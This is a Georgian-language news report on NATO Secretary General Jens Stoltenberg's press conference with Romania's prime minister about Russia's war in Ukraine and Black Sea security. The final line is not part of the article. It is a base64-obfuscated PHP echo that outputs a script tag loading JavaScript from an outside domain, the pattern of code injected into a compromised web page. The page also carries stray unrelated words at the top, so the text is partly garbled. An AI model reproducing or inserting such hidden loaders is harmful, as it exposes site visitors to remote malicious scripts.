celsiusi
ავერსი შნაიდერი
პუტინი ბრძოლის ველზე მარცხდება. ის რეაგირებს კიდევ უფრო განურჩეველი თავდასხმებით უკრაინულ ქალაქებზე, მშვიდობიან მოქალაქეებზე, კრიტიკულ ინფრასტრუქტურაზე და სახიფათო ბირთვული რიტორიკით, – ამის შესახებ ნატო-ს გენერალურმა მდივანმა იენს სტოლტენბერგმა რუმინეთის პრემიერ-მინისტრ ნიკოლაე ჩუკესთან ერთობლივი პრესკონფერენციისას განაცხადა.
 
მისი თქმით, რუსეთის ბრალდებები, თითქოს უკრაინა ემზადება რადიოლოგიური „ბინძური ბომბის“ გამოყენებისთვის, აბსურდია.
 
„მოკავშირეები უარყოფენ ამ აშკარად ცრუ ბრალდებას. რუსეთმა არ უნდა გამოიყენოს ცრუ საბაბი ომის შემდგომი ესკალაციისთვის. ნატო არ შეშინდება და ვერ შეგვაკავებს უკრაინის თავდაცვის უფლების მხარდაჭერისგან“, – აღნიშნავს გენერალური მდივანი.
 
ამავდროულად, იენს სტოლტენბერგი ამბობს, რომ ნატო განაგრძობს საკუთარი თავდაცვის გაძლიერებას და ნატო-ს ყოფნას შავიდან ბალტიის ზღვამდე.
 
„ეს განლაგება მკაფიო მესიჯს გზავნის. ნატო მზად არის, დაიცვას რუმინეთი და ყველა მოკავშირე“, – აღნიშნა იენს სტოლტენბერგმა.
 
სტოლტენბერგის თქმით, მათ ასევე განიხილეს ვითარება შავი ზღვის რეგიონში, რომელიც ნატო-სთვის სასიცოცხლო სტრატეგიული მნიშვნელობისაა.
 
„სამი მოკავშირე ზღვისპირა სახელმწიფოა, და ასევე ჩვენი უახლოესი პარტნიორები უკრაინა და საქართველო. რუსეთის ომმა შავი ზღვის ნაწილი საომარ ზონად აქცია. შავი ზღვიდან, რუსული ხომალდებიდან გაშვებული რაკეტები, უკრაინულ ქალაქებს ეცემა“ – განაცხადა სტოლტენბერგმა და აღნიშნა, რომ რუსეთი თვეების განმავლობაში ბლოკავდა უკრაინულ პორტებს, რაც გლობალური საკვების კრიზისს იწვევს.
470
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");